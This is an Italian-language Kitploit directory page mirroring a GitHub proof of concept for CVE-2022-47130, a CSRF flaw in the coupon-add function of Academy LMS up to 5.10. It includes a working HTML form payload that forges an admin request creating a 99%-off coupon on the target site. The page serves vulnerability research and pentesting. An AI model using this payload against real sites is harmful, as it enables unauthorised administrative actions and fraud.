Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2022-47130 — Academy LMS <= 5.10 CSRF | Kitploit
Strumenti/GitHubGitHub/openxp-research/cve-2022-47130
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubopenxp-research/cve-2022-47130

CVE-2022-47130

Academy LMS <= 5.10 CSRF

Vedi Repository
1 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2022-47130

Academy LMS <= 5.10 CSRF

Descrizione

Academy LMS è un'applicazione in cui le persone possono creare e pubblicizzare corsi. La funzionalità di aggiunta di un coupon è vulnerabile a CSRF poiché non esiste un token che possa impedire questo attacco.

Prova di concetto (POC)

Il primo passo della nostra prova di concetto è autenticarsi sulla piattaforma con un utente amministratore.

Dopo di che, basta accedere alla pagina che contiene il codice per sfruttare la vulnerabilità e notare che un nuovo coupon è stato creato automaticamente.

Codice utilizzato nell'exploit:

root@kitploit:~
<html>
   <body>
   <script>history.pushState('', '', '/')</script>
     <form action="https://target.com/admin/coupons/add" method="POST">
       <input type="hidden" name="code" value="vinix" />
       <input type="hidden" name="discount&#95;percentage" value="99" />
       <input type="hidden" name="expiry&#95;date" value="12&#47;11&#47;2022" />
       <input type="submit" value="Submit request" />
     </form>
   </body>
</html>
Scarica lo strumento